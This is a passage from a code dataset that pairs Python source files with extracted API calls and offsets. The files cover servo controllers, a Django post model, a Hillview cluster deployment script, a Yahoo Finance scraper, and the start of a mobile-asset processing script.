code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
import logging
import math
import time
from typing import Dict, List
from servo import Servo
class ControllerForPCA9685:
    """Drives hobby servos through an Adafruit PCA9685 PWM controller board."""

    def __init__(self, servos: Dict[object, Servo], chs: Dict[object, int],
                 pwm_freq: float, init_angles: Dict[object, float] = None):
        """Initialize the board and move every servo to its initial angle.

        :param servos: servo descriptor per key.
        :param chs: PCA9685 channel number per key (same keys as servos).
        :param pwm_freq: PWM frequency, in Hz, programmed into the board.
        :param init_angles: optional initial angle per key; defaults to each
            servo's mid-range angle.
        :raises ValueError: if the dictionaries' key sets differ.
        """
        import Adafruit_PCA9685 as PCA9685
        # BUG FIX: list.sort() returns None, so the original comparison
        # `list(a).sort() != list(b).sort()` compared None with None and the
        # key validation never triggered.  Compare the key sets instead.
        if set(servos.keys()) != set(chs.keys()):
            raise ValueError("servos and chs must share the same keys")
        if init_angles is None:
            # Default every servo to the middle of its mechanical range.
            init_angles = {k: (v.angle_min_deg + v.angle_max_deg) / 2
                           for k, v in servos.items()}
        elif set(servos.keys()) != set(init_angles.keys()):
            raise ValueError("servos and init_angles must share the same keys")
        self.servos = servos
        self.chs = chs
        self.pwm_freq = pwm_freq
        # Clamp the requested initial angles into each servo's valid range.
        self.init_angles = {k: servos[k].fix_angle(v)
                            for k, v in init_angles.items()}
        self.current_angles = self.init_angles.copy()
        PCA9685.software_reset()
        self.pca9685 = PCA9685.PCA9685()
        self.pca9685.set_pwm_freq(self.pwm_freq)
        for k in servos:
            self.pca9685.set_pwm(self.chs[k], 0, int(round(
                self.servos[k].angle_to_pwm_val(self.init_angles[k]))))
            # Worst-case wait: the servo's previous position is unknown.
            time.sleep(self.servos[k].wait_time(self.servos[k].angle_max_deg))

    def rotate(self, angles: Dict[object, float], is_relative: bool):
        """Rotate the given servos to (or by) the given angles.

        :param angles: target angle per servo key; deltas from the current
            angle when is_relative is True, absolute angles otherwise.
        :param is_relative: interpret angles as relative offsets.
        """
        for k, angle in angles.items():
            angle = self.servos[k].fix_angle(
                angle + (self.current_angles[k] if is_relative else 0.0))
            if math.isclose(self.current_angles[k], angle):
                continue  # already at the target, skip the write and wait
            angle_diff = abs(self.current_angles[k] - angle)
            logging.info("Controller: rotating %s from %f to %f",
                         k, self.current_angles[k], angle)
            self.pca9685.set_pwm(self.chs[k], 0, int(round(
                self.servos[k].angle_to_pwm_val(angle))))
            time.sleep(self.servos[k].wait_time(angle_diff))
            self.current_angles[k] = angle
class ControllerForRPi:
    """Drives hobby servos attached directly to Raspberry Pi GPIO pins."""

    def __init__(self, servos: Dict[object, Servo], pins: Dict[object, int],
                 init_angles: Dict[object, float] = None):
        """Set up one software-PWM channel per servo.

        :param servos: servo descriptor per key.
        :param pins: GPIO board pin number per key (same keys as servos).
        :param init_angles: optional initial angle per key; defaults to each
            servo's mid-range angle.
        :raises ValueError: if the dictionaries' key sets differ.
        """
        import RPi.GPIO as GPIO
        GPIO.setmode(GPIO.BOARD)
        # BUG FIX: list.sort() returns None, so the original comparison
        # `list(a).sort() != list(b).sort()` was always False and the key
        # validation never triggered.  Compare the key sets instead.
        if set(servos.keys()) != set(pins.keys()):
            raise ValueError("servos and pins must share the same keys")
        if init_angles is None:
            # Default every servo to the middle of its mechanical range.
            init_angles = {k: (v.angle_min_deg + v.angle_max_deg) / 2
                           for k, v in servos.items()}
        elif set(servos.keys()) != set(init_angles.keys()):
            raise ValueError("servos and init_angles must share the same keys")
        self.servos = servos
        self.pins = pins
        self.active_servos = set()  # keys whose PWM output is currently running
        self.init_angles = {k: servos[k].fix_angle(v)
                            for k, v in init_angles.items()}
        self.current_angles = self.init_angles.copy()
        self.pwms = {}
        self.gpio = GPIO
        for k in servos:
            self.gpio.setup(self.pins[k], GPIO.OUT)
            self.pwms[k] = self.gpio.PWM(pins[k], servos[k].pwm_freq)
        logging.info("Controller: initialized, set pins %s", pins)

    def __del__(self):
        # BUG FIX: guard against a partially-constructed instance (e.g. when
        # __init__ raised before self.gpio was assigned).
        if hasattr(self, "gpio"):
            self.gpio.cleanup()
        logging.info("Controller: deleted")

    def start(self, servos_key: List[object]):
        """Start PWM for the given servos and move them to their initial angles."""
        started = set()
        for k in servos_key:
            if k in self.servos and not (k in self.active_servos):
                init_duty_cycle \
                    = self.servos[k].angle_to_pwm_val(self.init_angles[k])
                self.pwms[k].start(init_duty_cycle)
                # Worst-case wait: the servo's previous position is unknown.
                time.sleep(
                    self.servos[k].wait_time(self.servos[k].angle_max_deg))
                self.active_servos.add(k)
                started.add(k)
        if len(started) > 0:
            logging.info("Controller: started %s", started)

    def stop(self, servos_key: List[object]):
        """Stop PWM output for the given servos (inactive keys are ignored)."""
        stopped = set()
        for k in servos_key:
            if k in self.servos and k in self.active_servos:
                self.pwms[k].stop()
                self.active_servos.remove(k)
                stopped.add(k)
        if len(stopped) > 0:
            logging.info("Controller: stopped %s", stopped)

    def rotate(self, angles: Dict[object, float], is_relative: bool):
        """Rotate the given active servos to (or by) the given angles.

        Keys that were never start()-ed are silently skipped.
        """
        for k, angle in angles.items():
            if not (k in self.active_servos):
                continue
            angle = self.servos[k].fix_angle(
                angle + (self.current_angles[k] if is_relative else 0.0))
            if math.isclose(self.current_angles[k], angle):
                continue  # already at the target
            angle_diff = abs(self.current_angles[k] - angle)
            logging.info("Controller: rotating %s from %f to %f",
                         k, self.current_angles[k], angle)
            self.pwms[k].ChangeDutyCycle(
                self.servos[k].angle_to_pwm_val(angle))
            time.sleep(self.servos[k].wait_time(angle_diff))
            # Zero duty cycle stops the pulse train after the move completes
            # (presumably to avoid servo jitter/hum -- confirm on hardware).
            self.pwms[k].ChangeDutyCycle(0.0)
            self.current_angles[k] = angle
| [
"math.isclose",
"Adafruit_PCA9685.software_reset",
"Adafruit_PCA9685.PCA9685",
"logging.info",
"RPi.GPIO.setmode"
] | [((965, 989), 'Adafruit_PCA9685.software_reset', 'PCA9685.software_reset', ([], {}), '()\n', (987, 989), True, 'import Adafruit_PCA9685 as PCA9685\n'), ((1013, 1030), 'Adafruit_PCA9685.PCA9685', 'PCA9685.PCA9685', ([], {}), '()\n', (1028, 1030), True, 'import Adafruit_PCA9685 as PCA9685\n'), ((2259, 2283), 'RPi.GPIO.setmode', 'GPIO.setmode', (['GPIO.BOARD'], {}), '(GPIO.BOARD)\n', (2271, 2283), True, 'import RPi.GPIO as GPIO\n'), ((3139, 3197), 'logging.info', 'logging.info', (['"""Controller: initialized, set pins %s"""', 'pins'], {}), "('Controller: initialized, set pins %s', pins)\n", (3151, 3197), False, 'import logging\n'), ((3262, 3297), 'logging.info', 'logging.info', (['"""Controller: deleted"""'], {}), "('Controller: deleted')\n", (3274, 3297), False, 'import logging\n'), ((1566, 1609), 'math.isclose', 'math.isclose', (['self.current_angles[k]', 'angle'], {}), '(self.current_angles[k], angle)\n', (1578, 1609), False, 'import math\n'), ((1722, 1814), 'logging.info', 'logging.info', (['"""Controller: rotating %s from %f to %f"""', 'k', 'self.current_angles[k]', 'angle'], {}), "('Controller: rotating %s from %f to %f', k, self.\n current_angles[k], angle)\n", (1734, 1814), False, 'import logging\n'), ((3849, 3896), 'logging.info', 'logging.info', (['"""Controller: started %s"""', 'started'], {}), "('Controller: started %s', started)\n", (3861, 3896), False, 'import logging\n'), ((4215, 4262), 'logging.info', 'logging.info', (['"""Controller: stopped %s"""', 'stopped'], {}), "('Controller: stopped %s', stopped)\n", (4227, 4262), False, 'import logging\n'), ((4597, 4640), 'math.isclose', 'math.isclose', (['self.current_angles[k]', 'angle'], {}), '(self.current_angles[k], angle)\n', (4609, 4640), False, 'import math\n'), ((4753, 4845), 'logging.info', 'logging.info', (['"""Controller: rotating %s from %f to %f"""', 'k', 'self.current_angles[k]', 'angle'], {}), "('Controller: rotating %s from %f to %f', k, self.\n current_angles[k], angle)\n", (4765, 4845), 
False, 'import logging\n')] |
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
# Create your models here.
# Create your models here.
class Neighbor(models.Model) :
    """A neighborhood post: an image plus text authored by a registered user."""
    n_name = models.CharField(max_length=35)      # poster's display name
    n_location = models.CharField(max_length=35)  # free-text location label
    n_image = models.ImageField(upload_to='n_posts/')  # stored under MEDIA_ROOT/n_posts/
    n_title = models.CharField(max_length=100)
    n_post = models.TextField()  # post body, unlimited length
    # Deleting the author also deletes all of their posts (CASCADE).
    n_author = models.ForeignKey(User, on_delete=models.CASCADE)
    # timezone.now is passed uncalled so the timestamp is taken at save time.
    n_date_posted = models.DateTimeField(default=timezone.now)
    def __str__(self) :
        return self.n_title
class Meta :
ordering = ['n_date_posted'] | [
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.DateTimeField",
"django.db.models.ImageField",
"django.db.models.CharField"
] | [((180, 211), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(35)'}), '(max_length=35)\n', (196, 211), False, 'from django.db import models\n'), ((227, 258), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(35)'}), '(max_length=35)\n', (243, 258), False, 'from django.db import models\n'), ((271, 310), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""n_posts/"""'}), "(upload_to='n_posts/')\n", (288, 310), False, 'from django.db import models\n'), ((323, 355), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (339, 355), False, 'from django.db import models\n'), ((367, 385), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (383, 385), False, 'from django.db import models\n'), ((399, 448), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'on_delete': 'models.CASCADE'}), '(User, on_delete=models.CASCADE)\n', (416, 448), False, 'from django.db import models\n'), ((467, 509), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (487, 509), False, 'from django.db import models\n')] |
#!/usr/bin/env python3
"""This python program deploys the files needed by the Hillview service
on the machines specified in the configuration file."""
# pylint: disable=invalid-name
from argparse import ArgumentParser
import tempfile
import os.path
from hillviewCommon import ClusterConfiguration, get_config, get_logger
# Module-wide logger; every deployment step below logs through it.
logger = get_logger("deploy")
def generate_script(config, rh, template):
    """Generate a host-specific shell script from a template.

    Replaces the line containing REPLACE_WITH_VARIABLES with configuration
    variables, writes the result next to the template (with the "-template"
    suffix stripped from the name) and marks it group-executable.

    :param config: ClusterConfiguration with folder/port/tomcat settings.
    :param rh: remote host descriptor (host, user, heapsize).
    :param template: path of the template shell script.
    """
    logger.info("Generating script for host " + rh.host + " from " + template)
    variables = ""
    variables += "SERVICE_DIRECTORY=" + config.service_folder + "\n"
    variables += "HEAPSIZE=\"" + rh.heapsize + "\"\n"
    variables += "USER=" + rh.user + "\n"
    variables += "WORKER_PORT=" + str(config.worker_port) + "\n"
    variables += "AGGREGATOR_PORT=" + str(config.aggregator_port) + "\n"
    variables += "CLEANUP=" + str(1 if config.cleanup_on_install() else 0) + "\n"
    variables += "TOMCAT=" + config.tomcat + "\n"
    # BUG FIX: the original `list(open(template))` never closed the file
    # handle; use a context manager so it is released promptly.
    with open(template) as template_file:
        lines = template_file.readlines()
    filename = template.replace("-template", "")
    lines = [variables if "REPLACE_WITH_VARIABLES" in x else x for x in lines]
    with open(filename, "w") as f:
        f.write("# Automatically generated from " + template)
        for l in lines:
            f.write(l)
    os.chmod(filename, 0o770)
def prepare_webserver(config):
    """Deploys files needed by the Hillview web server"""
    logger.info("Creating web service folder")
    assert isinstance(config, ClusterConfiguration)
    rh = config.get_webserver()
    message = "Preparing web server " + str(rh)
    logger.info(message)
    rh.create_remote_folder(config.service_folder)
    rh.create_remote_folder(config.service_folder + "/bookmark")
    rh.run_remote_shell_command("chown " + config.get_user() + " " + config.service_folder)
    # Tomcat archives on archive.apache.org are grouped by major version,
    # e.g. "9" for version "9.0.27".
    major = config.tomcat_version[0:config.tomcat_version.find('.')]
    # Download and unpack Tomcat on the remote host only if it is missing.
    installTomcat = "cd " + config.service_folder + ";" + \
        "if [ ! -d " + config.tomcat + " ]; then " + \
        "wget http://archive.apache.org/dist/tomcat/tomcat-" + major + "/v" + \
        config.tomcat_version + "/bin/" + config.tomcat + ".tar.gz;" + \
        "tar xvfz " + config.tomcat + ".tar.gz;" + \
        "rm -f " + config.tomcat + ".tar.gz; fi"
    tomcatFolder = config.service_folder + "/" + config.tomcat
    rh.run_remote_shell_command(installTomcat)
    # Replace Tomcat's default ROOT webapp with the Hillview web UI war.
    rh.run_remote_shell_command("rm -rf " + tomcatFolder + "/webapps/ROOT")
    rh.copy_file_to_remote(
        config.scriptFolder +
        "/../web/target/web-1.0-SNAPSHOT.war",
        tomcatFolder + "/webapps/ROOT.war", "")
    # The server list names the aggregators when present, otherwise the
    # workers are addressed directly.
    tmp = tempfile.NamedTemporaryFile(mode="w", delete=False)
    agg = config.get_aggregators()
    if agg:
        for a in agg:
            tmp.write(a.host + ":" + str(config.aggregator_port) + "\n")
    else:
        for h in config.get_workers():
            tmp.write(h.host + ":" + str(config.worker_port) + "\n")
    tmp.close()
    rh.copy_file_to_remote(tmp.name, config.service_folder + "/serverlist", "")
    os.unlink(tmp.name)
    generate_script(config, rh, "hillview-webserver-manager-template.sh")
    rh.copy_file_to_remote(
        "hillview-webserver-manager.sh", config.service_folder, "")
    os.unlink("hillview-webserver-manager.sh")
def create_service_folder(config, rh):
    """Create the Hillview service folder hierarchy on one remote host."""
    assert isinstance(config, ClusterConfiguration)
    rh.create_remote_folder(config.service_folder)
    chown_command = "chown " + config.get_user() + " " + config.service_folder
    rh.run_remote_shell_command(chown_command)
    rh.create_remote_folder(config.service_folder + "/hillview")
def prepare_worker(config, rh):
    """Copy the worker jar and management scripts onto one remote machine."""
    assert isinstance(config, ClusterConfiguration)
    logger.info("Preparing worker " + str(rh))
    create_service_folder(config, rh)
    jar_path = (config.scriptFolder +
                "/../platform/target/hillview-server-jar-with-dependencies.jar")
    rh.copy_file_to_remote(jar_path, config.service_folder, "")
    # Instantiate the manager script from its template and push it over.
    generate_script(config, rh, "hillview-worker-manager-template.sh")
    rh.copy_file_to_remote(
        "hillview-worker-manager.sh", config.service_folder, "")
    rh.copy_file_to_remote("forever.sh", config.service_folder, "")
    os.unlink("hillview-worker-manager.sh")
def prepare_aggregator(config, rh):
    """Copy the aggregator jar, worker list and scripts onto a remote machine."""
    assert isinstance(config, ClusterConfiguration)
    logger.info("Preparing aggregator " + str(rh))
    # An aggregator that doubles as a worker already has its service folder,
    # so only create it for dedicated aggregator machines.
    is_also_worker = any(worker.host == rh.host
                         for worker in config.get_workers())
    if not is_also_worker:
        create_service_folder(config, rh)
    rh.copy_file_to_remote(
        config.scriptFolder +
        "/../platform/target/hillview-server-jar-with-dependencies.jar",
        config.service_folder + "/hillview", "")
    # Build the list of workers this aggregator fans out to.
    workers_file = tempfile.NamedTemporaryFile(mode="w", delete=False)
    for child in rh.children:
        workers_file.write(child + ":" + str(config.worker_port) + "\n")
    workers_file.close()
    rh.copy_file_to_remote(workers_file.name,
                           config.service_folder + "/workers", "")
    os.unlink(workers_file.name)
    generate_script(config, rh, "hillview-aggregator-manager-template.sh")
    rh.copy_file_to_remote(
        "hillview-aggregator-manager.sh", config.service_folder, "")
    os.unlink("hillview-aggregator-manager.sh")
def prepare_workers(config):
    """Deploy files onto every Hillview worker in the cluster."""
    assert isinstance(config, ClusterConfiguration)
    config.run_on_all_workers(lambda worker: prepare_worker(config, worker))
def prepare_aggregators(config):
    """Deploy files onto every Hillview aggregator in the cluster."""
    assert isinstance(config, ClusterConfiguration)
    config.run_on_all_aggregators(lambda agg: prepare_aggregator(config, agg))
def main():
    """Parse the cluster configuration and deploy all Hillview components."""
    arg_parser = ArgumentParser()
    arg_parser.add_argument("config", help="json cluster configuration file")
    parsed_args = arg_parser.parse_args()
    cluster = get_config(arg_parser, parsed_args)
    # Web server first, then the aggregation tier, then the workers.
    prepare_webserver(cluster)
    prepare_aggregators(cluster)
    prepare_workers(cluster)
if __name__ == "__main__":
    # Allow the module to be imported without triggering a deployment.
    main()
| [
"hillviewCommon.get_logger",
"hillviewCommon.get_config",
"argparse.ArgumentParser",
"tempfile.NamedTemporaryFile"
] | [((336, 356), 'hillviewCommon.get_logger', 'get_logger', (['"""deploy"""'], {}), "('deploy')\n", (346, 356), False, 'from hillviewCommon import ClusterConfiguration, get_config, get_logger\n'), ((2641, 2692), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'mode': '"""w"""', 'delete': '(False)'}), "(mode='w', delete=False)\n", (2668, 2692), False, 'import tempfile\n'), ((5036, 5087), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'mode': '"""w"""', 'delete': '(False)'}), "(mode='w', delete=False)\n", (5063, 5087), False, 'import tempfile\n'), ((5960, 5976), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (5974, 5976), False, 'from argparse import ArgumentParser\n'), ((6095, 6119), 'hillviewCommon.get_config', 'get_config', (['parser', 'args'], {}), '(parser, args)\n', (6105, 6119), False, 'from hillviewCommon import ClusterConfiguration, get_config, get_logger\n')] |
import urllib3
from beautifulsoup4 import beautifulsoup4 as bs
def get_historical_data(name, number_of_days):
    """Scrape up to `number_of_days` of daily 'Open' prices for ticker `name`.

    Returns a list of {'Date': str, 'Open': float} dicts, newest first,
    parsed from the Yahoo Finance history page.  Dividend rows are skipped.
    """
    # BUG FIX: urllib3 has no urlopen(), and there is no importable module
    # named `beautifulsoup4` (the PyPI package installs as `bs4`).  Import
    # the working equivalents locally so this function is self-contained.
    from urllib.request import urlopen
    from bs4 import BeautifulSoup
    data = []
    url = "https://finance.yahoo.com/quote/" + name + "/history/"
    soup = BeautifulSoup(urlopen(url).read(), "html.parser")
    rows = soup.findAll('table')[0].tbody.findAll('tr')
    for each_row in rows:
        divs = each_row.findAll('td')
        if divs[1].span.text != 'Dividend':  # Ignore this row in the table
            # I'm only interested in 'Open' price; For other values, play with divs[1 - 5]
            data.append({'Date': divs[0].span.text,
                         'Open': float(divs[1].span.text.replace(',', ''))})
    return data[:number_of_days]
#Test
# print get_historical_data('amzn', 15)
# https://query1.finance.yahoo.com/v7/finance/download/WFC?period1=1561874153&period2=1593496553&interval=1d&events=history
# https://query1.finance.yahoo.com/v7/finance/download/WFC?period1=1561874369&period2=1593496769&interval=1d&events=history
# https://query1.finance.yahoo.com/v7/finance/download/AMZN?period1=1561874338&period2=1593496738&interval=1d&events=history
# max
# https://query1.finance.yahoo.com/v7/finance/download/WFC?period1=76204800&period2=1593388800&interval=1d&events=history
# https://query1.finance.yahoo.com/v7/finance/download/VBIV?period1=1031097600&period2=1593388800&interval=1d&events=history | [
"urllib3.urlopen"
] | [((196, 216), 'urllib3.urlopen', 'urllib3.urlopen', (['url'], {}), '(url)\n', (211, 216), False, 'import urllib3\n')] |
#!/usr/bin/python
import os, glob, hashlib, pickle, argparse, shutil, ntpath
import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys
from multiprocessing import Pool
from functools import partial
######################### Classes ##############################
class AndroidDensity:
    """One Android density bucket: output folder plus scale factor."""

    def __init__(self, name, path, scaleFactor):
        """Store the density descriptor fields verbatim."""
        self.name = name                # human-readable name, e.g. "HDPI"
        self.path = path                # output folder, e.g. "drawable-hdpi/"
        self.scaleFactor = scaleFactor  # scale relative to the raw asset
class IosDensity:
    """One iOS density variant: file-name suffix plus scale factor."""

    def __init__(self, name, suffix, scaleFactor):
        """Store the density descriptor fields verbatim."""
        self.name = name                # human-readable name, e.g. "@2X"
        self.suffix = suffix            # file-name suffix ("" for @1X)
        self.scaleFactor = scaleFactor  # scale relative to the raw asset
class Colors:
    # ANSI terminal escape codes used to colorize console output.
    PURPLE = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    ENDC = '\033[0m'  # resets all attributes back to the terminal default
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
################################################################
################# Directories configuration ####################
################# Directories configuration ####################
dirRoot = "./"                      # base folder for all relative paths
dirRaw = dirRoot + "raw/"           # input: raw full-resolution PNG assets
dirAssets = dirRoot + "drawables/"  # output: processed density-specific assets
# ScaleFactor with origin in XXXHDPI density. Source: http://jennift.com/dpical.html
androidDensities = [
    AndroidDensity("HDPI", "drawable-hdpi/", 0.375),
    AndroidDensity("X-HDPI", "drawable-xhdpi/", 0.5),
    AndroidDensity("XX-HDPI", "drawable-xxhdpi/", 0.75),
    AndroidDensity("XXX-HDPI", "drawable-xxxhdpi/", 1.0)
]
# ScaleFactor with origin in @3X density.
iosDensities = [
    IosDensity("@1X", "", 0.333333),
    IosDensity("@2X", "@2X", 0.666666),
    IosDensity("@3X", "@3X", 1.0)
]
################################################################
# Constants
STORAGE_FILE_NAME = ".warp_storage"  # pickle of {path: md5} from the last run
TARGET_ANDROID = "android"
TARGET_IOS = "ios"
# Variables with default values (overwritten by parseCommandLineOptions).
# NOTE(review): shouldForceCleanProject is only defined inside
# parseCommandLineOptions(); it is always called before any use.
poolThreads = multiprocessing.cpu_count() + 1  # worker processes for the pool
upToDateFiles = []
deletedFiles = []
newFiles = []
modifiedFiles = []
targetPlatform = ""
shouldCleanProject = False
shouldRunSilently = False
versionName = "1.0.1"
# Script entry point
def main():
    """Script entry point: parse options, then clean or process raw assets."""
    parseCommandLineOptions()
    greet()
    setUpPathVariables()
    if not (shouldCleanProject or shouldForceCleanProject):
        # Normal run: diff the raw folder against the stored hashes and
        # process each category of change.
        makeRequiredDirectories()
        classifyRawFiles(upToDateFiles, deletedFiles, newFiles, modifiedFiles)
        processUpToDateAssets(upToDateFiles)
        processNewAssets(newFiles)
        processModifiedAssets(modifiedFiles)
        processDeletedAssets(deletedFiles)
    else:
        cleanProject()
    goodbye()
# Parse command line options and store them in variables
def parseCommandLineOptions():
    """Parse the CLI options and publish them as module-level globals.

    Mutates: targetPlatform, dirRaw, dirAssets, shouldCleanProject,
    shouldForceCleanProject, shouldRunSilently, poolThreads.
    """
    parser = argparse.ArgumentParser(description="Seamless mobile assets management")
    baseGroup = parser.add_argument_group('Basic usage')
    baseGroup.add_argument("-t", "--target",
                           dest="target",
                           required=True,
                           choices=[TARGET_ANDROID, TARGET_IOS],
                           help="specifies the platform where the assets will be used",
                           metavar=TARGET_ANDROID + "/" + TARGET_IOS)
    baseGroup.add_argument("-i", "--input",
                           dest="input",
                           help="directory where the raw assets are located",
                           metavar="\"raw/assets/path\"")
    baseGroup.add_argument("-o", "--output",
                           dest="output",
                           help="directory where the processed assets will be placed",
                           metavar="\"proccesed/assets/path\"")
    baseGroup.add_argument("-v", "--version",
                           action='version',
                           version='%(prog)s ' + versionName)
    baseGroup.add_argument("-T", "--threads",
                           dest="threads",
                           help="number of threads to use while processing the assets",
                           metavar="N",
                           default=multiprocessing.cpu_count() + 1,
                           type=int)
    buildGroup = parser.add_argument_group('Processing options')
    buildGroup.add_argument("-c", "--clean",
                            action="store_true",
                            default=False,
                            dest="clean",
                            help="remove every generated asset")
    buildGroup.add_argument("-f", "--force-clean",
                            action="store_true",
                            default=False,
                            dest="force_clean",
                            help="forces the removal of the output folder")
    uiGroup = parser.add_argument_group('UI')
    uiGroup.add_argument("-s", "--silent",
                         action="store_true",
                         default=False,
                         dest="silent",
                         help="doesn't show the welcome message")
    # Save parsed options as global variables
    global targetPlatform
    global dirRaw
    global dirAssets
    global shouldCleanProject
    global shouldForceCleanProject
    global shouldRunSilently
    global poolThreads
    args = parser.parse_args()
    targetPlatform = args.target
    # Only override the directory defaults when the flags were supplied.
    if args.input: dirRaw = args.input
    if args.output: dirAssets = args.output
    shouldCleanProject = args.clean
    shouldForceCleanProject = args.force_clean
    shouldRunSilently = args.silent
    # Guard against nonsensical values: always keep at least one worker.
    poolThreads = args.threads if args.threads > 0 else 1
# Greet
def greet():
    """Print the WARP ASCII banner unless running in silent mode."""
    if shouldRunSilently:
        return
    banner = [
        "                                      ",
        "    **********************************",
        "    *      _       _____    ____     *",
        "    *     | |     / /   |  / __ \\    *",
        "    *     | | /| / / /| | / /_/ /    *",
        "    *     | |/ |/ / ___ |/ _, _/     *",
        "    *     |__/|__/_/  |_/_/ |_|      *",
        "    *                                *",
        "    *  Wolox Assets Rapid Processor  *",
        "    **********************************",
        "                 v."+ versionName +"               ",
        "                                      "
    ]
    for banner_line in banner:
        print(Colors.PURPLE + banner_line + Colors.ENDC)
# Adds neccesary PATH variables. Useful when running the script from a non
# user shell (like with Gradle in Android)
def setUpPathVariables():
    """Append /usr/local/bin to PATH.

    Non-login shells (e.g. Gradle invoking this script) may not have it,
    and that is where ffmpeg/pngquant usually live.
    """
    os.environ['PATH'] += ":/usr/local/bin"
# Clears previously processed assets and the hash storage file
def cleanProject():
    """Remove every generated asset, empty density folders and the hash store."""
    print(Colors.YELLOW + "Cleaning previously processed assets..." + Colors.ENDC)
    # Dictionary of previously hashed files: <file path, MD5 hash>
    storedHashedFiles = loadHashedFiles()
    # BUG FIX: dict.iteritems() is Python 2 only and raises AttributeError
    # under Python 3 (which this script otherwise targets); use items().
    for path, md5 in storedHashedFiles.items():
        assetToClean = ntpath.basename(path)
        print(Colors.BLUE + "DELETING ASSET: " + assetToClean + Colors.ENDC)
        deleteAsset(assetToClean)
    # Remove generated density folders if empty (always when force-cleaning).
    for density in androidDensities:
        densityDir = dirAssets + density.path
        if os.path.exists(densityDir) and (os.listdir(densityDir) == [] or shouldForceCleanProject):
            print(Colors.BLUE + "DELETING ASSET DIRECTORY: " + densityDir + Colors.ENDC)
            if shouldForceCleanProject:
                shutil.rmtree(densityDir)
            else:
                os.rmdir(densityDir)
    # Remove assets output folder if empty
    if os.path.exists(dirAssets) and os.listdir(dirAssets) == []:
        print(Colors.BLUE + "DELETING EMPTY OUTPUT DIRECTORY: " + dirAssets + Colors.ENDC)
        os.rmdir(dirAssets)
    # Remove storage file
    if os.path.exists(dirRaw + STORAGE_FILE_NAME):
        os.remove(dirRaw + STORAGE_FILE_NAME)
    print(Colors.YELLOW + "Assets cleared" + Colors.ENDC)
# Make the required directories to process asssets if they doesn't exist already
def makeRequiredDirectories():
    """Create the raw input and per-platform output directories if missing."""
    # Raw assets folder.
    if not os.path.exists(dirRaw):
        print("Making directory for raw assets: " + dirRaw)
        os.makedirs(dirRaw)
    if targetPlatform == TARGET_ANDROID:
        # One drawable folder per Android density bucket.
        for bucket in androidDensities:
            bucket_dir = dirAssets + bucket.path
            if os.path.exists(bucket_dir):
                continue
            print("Making directory for Android assets: " + bucket_dir)
            os.makedirs(bucket_dir)
    elif not os.path.exists(dirAssets):
        # iOS keeps every density variant in a single folder.
        print("Making directory for iOS assets:" + dirAssets)
        os.makedirs(dirAssets)
# Classify raw files into collections of up to date, deleted, new and modified files
def classifyRawFiles(upToDateFiles, deletedFiles, newFiles, modifiedFiles):
    """Classify raw files into up-to-date / deleted / new / modified lists.

    Compares the MD5 hashes computed now against the ones persisted by the
    previous run and appends each raw file path to the matching output list.
    """
    # Dictionary of previously hashed files: <file path, MD5 hash>
    storedHashedFiles = loadHashedFiles()
    # Dictionary of newly hashed files, ready to diff: <file path, MD5 hash>
    recentlyHashedFiles = hashRawFiles()
    saveHashedFiles(recentlyHashedFiles)
    # BUG FIX: dict.iteritems() is Python 2 only; use items() under Python 3.
    for path, md5 in recentlyHashedFiles.items():
        if path in storedHashedFiles:
            # BUG FIX: the original compared `md5 == recentlyHashedFiles[path]`,
            # i.e. a value against itself (always True), so every surviving
            # file was classified as up to date.  Compare against the STORED
            # hash instead.
            if md5 == storedHashedFiles[path]:
                # CASE 1: present and unchanged
                upToDateFiles.append(path)
            else:
                # CASE 2: present but the content changed
                modifiedFiles.append(path)
            # Remove the processed entry either way, so the leftovers below
            # are exactly the deleted files.
            del storedHashedFiles[path]
        else:
            # CASE 3: not previously hashed, must be a new file
            newFiles.append(path)
    # The leftovers in the previous hash dictionary must be the deleted files
    for path in storedHashedFiles:
        deletedFiles.append(path)
# Hash (MD5) files in the raw directory and return them as a dictionary <file path, MD5 hash>
def hashRawFiles():
    """Return {file path: MD5 hex digest} for every PNG in the raw directory."""
    CHUNK_SIZE = 65536
    hashed = {}
    for png_path in glob.glob(dirRaw + "*.png"):
        digest = hashlib.md5()
        # Hash in fixed-size chunks so large images stay memory-friendly.
        with open(png_path, 'rb') as raw_file:
            for chunk in iter(lambda: raw_file.read(CHUNK_SIZE), b''):
                digest.update(chunk)
        hashed[png_path] = digest.hexdigest()
    return hashed
# Store a dictionary of files to Hash
def saveHashedFiles(filesToHash):
    """Persist the {path: hash} dictionary into the raw folder's storage file."""
    storage_path = dirRaw + STORAGE_FILE_NAME
    with open(storage_path, "wb") as storage:
        pickle.dump(filesToHash, storage, pickle.HIGHEST_PROTOCOL)
# Retrieve a dictionary of hashed files
def loadHashedFiles():
    """Return the previously stored {path: hash} dictionary, or {} if absent."""
    storage_path = dirRaw + STORAGE_FILE_NAME
    try:
        with open(storage_path, "rb") as storage:
            return pickle.load(storage)
    except IOError:
        # First run, or the storage file was cleaned: nothing stored yet.
        return {}
# Process files that we found in a previous run by the script
def processUpToDateAssets(upToDateFiles):
    """Log the assets whose raw file has not changed since the last run."""
    for asset_path in upToDateFiles:
        asset_name = os.path.basename(asset_path)
        print(Colors.BLUE + asset_name + ": STATE > UP TO DATE" + Colors.ENDC)
# Execute a specific function in a pool of workers for every "argument" in mapArguments.
def mapInWorkers(function, mapArguments):
    """Apply `function` to every element of `mapArguments` in a process pool.

    Exits the whole script with status 1 if the user interrupts the run.
    """
    pool = Pool(poolThreads)
    try:
        # map_async().get(<large timeout>) instead of a plain map() --
        # presumably so KeyboardInterrupt reaches this (main) process while
